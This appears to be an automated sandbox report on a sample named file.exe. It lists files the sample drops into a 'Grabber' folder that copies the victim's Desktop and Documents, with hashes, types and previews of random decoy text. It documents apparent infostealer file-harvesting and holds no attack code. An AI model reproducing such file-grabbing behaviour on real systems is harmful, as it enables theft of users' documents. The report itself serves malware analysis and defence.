                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\WSHEJMDVQC.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\WSHEJMDVQC.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):282
                                                                                                                                                            Entropy (8bit):3.514693737970008
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                                                                                                            MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                                                                                                            SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                                                                                                            SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                                                                                                            SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\BQJUWOYRTO.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                            MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                            SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                            SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                            SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\FAAGWHBVUU.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696563923881884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
                                                                                                                                                            MD5:CD90073A050D84BFC07DF7516A76BE8F
                                                                                                                                                            SHA1:5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
                                                                                                                                                            SHA-256:8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
                                                                                                                                                            SHA-512:A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:FAAGWHBVUUTPYVPHIDCKTSBBSJUWTPUSSQPMHQUEMEBFCRWOAGJBQFMXAGBRPPFMHYWZIVRYBYMLKSXBSVILBCREELIWCKXNLCFIWEZDKMNCFDFOVWLODVKQDZGKMNYKLEHRBLUSDVAZUPAREKTGWPSMEKUFMSLHXIKBIKFPKZTPIOVIWVCVEJBCECJMVZRWUFQKCHCDYMYSSNRYBTIYNJWBANTLSHUBWBRJPBZZNLFWUYJYBZIFPLPPSEZPOWEXVUHUJVJASMBCBQBMFYQHVFSDQVYOLOSARXZKXXONRBTMLGOTIENUWCOGJDANHCVTLBZKPLVIFICSYNNJDATITDCBHEATBFVVWLYLVGPXPBNVZHSPQOQVQNCQYBVJOQWIXIWBKDYYWBPNGFVJXXNBRMGKWWJYWGWBHIUEODZOQXRSLBZXJJPRVPCNTLVWWBLEVZTISPLUBADWNHYMMXYQUJWRECXAWEMKHIFYNPSWFNBKCKBCJAGWZVXGZAWQINZMAFPDGCTHXKXRDHWVKCCJQPZXLYTVPZLRVZELUVGBKPPWVPJNXPRLEEVEFJWIGEUIFCYFGOVZGYDSCDAQRMYJZQFYVLTANLMTLPXDPETVFGVJLPLKVCVPQFBHOXQRDYDIFYETSNYPWEVULVONZZBKSGIAZAMTXYMWISOFKQROAOZARHYXANJYXEXTERVKOFUSRDEHZCDOFBQMVCBXCHWUZOHSBRMBBAQNTBQIBXGWVMOGTTGSTIUIDNQZDCFUCSMZVEQTTRYGONMNKOUSVTNBMJXKCOXBLVQHFAAKIGBNDXZNYXNNSSESCPRHGMHBRSZZNJNGYXTMEQKCQQIYVDWDVXKEWBNJQQHOWQHHBAFFHTQLQQDBFVCGIUCNYMRAKDUTKSGMARKQACHUFYEGEUWZGJIPGBFYMIYONLAVYEOXUFICGTJCCRVOHBQQWRVQLRQIKKBTSDUERUZYUBPRBMCDSNKSKJAOCQNYWMDZDCEF

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\GJBHWQDROJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694921863932654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IrXCbQfFinplOQLb3PE8zc+qQtqXyXp0KS5bvAcIFZD/:ITCbWiplOQHXzddmyC5LkN/
                                                                                                                                                            MD5:62949C1D490A67816174BD0CD1F9264D
                                                                                                                                                            SHA1:1F3D8262179A769CDCCECE24AAAC12384E1C3F26
                                                                                                                                                            SHA-256:DD2EED4F65D047B47F0BA09DF3A4CB1AEF399952780B8011D07C7F800CFDCC89
                                                                                                                                                            SHA-512:7E067C700CD325164E580CF6BF383042143332F6E2AE57D422A676C4D50E39712FF0BBE0DBC674BDDD89EBDA26068F076AD2999811F7A171CE77F95566186807
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GJBHWQDROJTTUSYIVSDOQIDPSJWMHPSLMXRIDWCWZNBCVLJGHNRTOFCIHNVPKSKWUWSERWJZGSUFAZTPJLUGPATEJEGCTIGWCTURHURXMOUKRCHIYAOWIWUWNKDBSKTIERRXTRYZTHTWVMTHGREIYRUGPXREMKMFRCCSZTFAKZNXFCAAULLWINOLUONZMAZSJPPRULAPILELOBZRVQKOPKDDFTRLIXEMHWSCSVLIZZXKNOZNZBAGJVHYBFATRUBEDSKAVYVSXHRDBAGYYRLMXVOWEVHNLKTHBIXHDHJVEEJCXTFXGQFGNEBKUPMFEWJGNBUBWWZZDHNTBWHLXQIQLSMFSNFFULYGZVJZMIINYLAVKHKJGRFMMFSCWJRMHAIRUCMWOSJGSZYRTETJTKRVZMRQTPGGCWVJQLUITHFHDZLCLQXAUWYRNETHGQEJCAZCLREUWRPKKEVARVYUEZJXCTUKDPOKTSLARNKLXEMFMSZXZBHQIPSSYOLUXVXNSRNTJKWKYDLHNAIREGBXNMXDZERNNOFVAEXDKZSDWXVXBHXLRTFKTHEHBWCKYBWJUSHHUDGURWSYNPQYWRSVYOLTMJLJWOQZHYSCIRNQUMSQLHBFHUQCPBTQLIOUMLSKXHTBDOAGAJCXUAAAOUZUQUDTZGIJWPQZPMPSLSQPAAHNFLWHYEVELFQFWXTMLOONNMANEDUFMOIXFUTHDDZOTKLVWUOGVMDULSQLPUPYEQDOHLXZEDRRMVKDEDNTGKNGOGCRKIPSIOEAFSSGSBZCCHZABVGPSSHTHLEAEFBAAMHOPUUTXVEGEHVKWVHABRMXGECIUCBQPOZPFHWOHRWVJVBOPBMVJWNCYFVCZIGVJIZMGHKWRVTJPZPQHZWZJEZYNHKJHGFWHCGOTLCECZSRWYLNBSBQKVGCMNZAVMUDQNJQSMHFLQSZEDWJDUOCKBPBKSNPZNGIOCHYOTBZLXOQZZCTWWKLLGKWFYIYXMWTBXLB

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\GNLQNHOLWB.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\GNLQNHOLWB.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
